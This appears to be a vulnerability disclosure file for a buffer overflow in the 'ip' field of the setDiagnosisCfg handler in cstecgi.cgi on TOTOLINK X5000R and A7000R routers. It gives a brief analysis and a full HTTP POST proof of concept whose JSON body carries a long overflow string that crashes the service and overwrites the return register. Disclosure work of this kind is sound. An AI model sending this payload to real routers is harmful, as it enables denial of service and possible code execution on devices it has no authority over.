Skip to content

Latest commit

 

History

History
56 lines (30 loc) · 2.88 KB

Vulnerability Information_1.md

File metadata and controls

56 lines (30 loc) · 2.88 KB
Raw

Vulnerability Title: TOTOTOLINK - X5000R V9.1.0u.6118-B20201102 Model and A7000R V9.1.0u.6115-B20201022 There is a buffer overflow vulnerability in the IP field, which can cause denial of service attacks and even arbitrary code execution

Affected version: X5000R V9.1.0u.6118-B2020 1102 A7000 R V9.1.0u.6115-B2020 1022

Discovered on December 20, 2023

Discovered by : He Nan (2777256035@qq.com)

Analysis report:

When the sub_41F7E8 function in the/www/cgi bin/cstegi.cgi file (using X5000R device as an example) was triggered to copy the content of the IP field by the sprintf function, the data length was not checked, resulting in a buffer overflow

image-20240304170217712

Attack demonstration:

Send a normal data packet to the vulnerability interface of the router, with an IP field of four A's, and see that the returned packet is in a normal 200 state

image-20240304170622236

If the data in the IP field is sent as a large amount of junk data, it is found that the returned data packet is a 500 status code

image-20240304170724634

Telnet debugged inside the router and found that the $ra register had been hijacked to 0x61616161, which means we can redirect the execution flow to any known address in the process and execute code from anywhere

image-20240304170910942

POC

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 742
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


{"ip":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num":"2","topicurl":"setDiagnosisCfg"}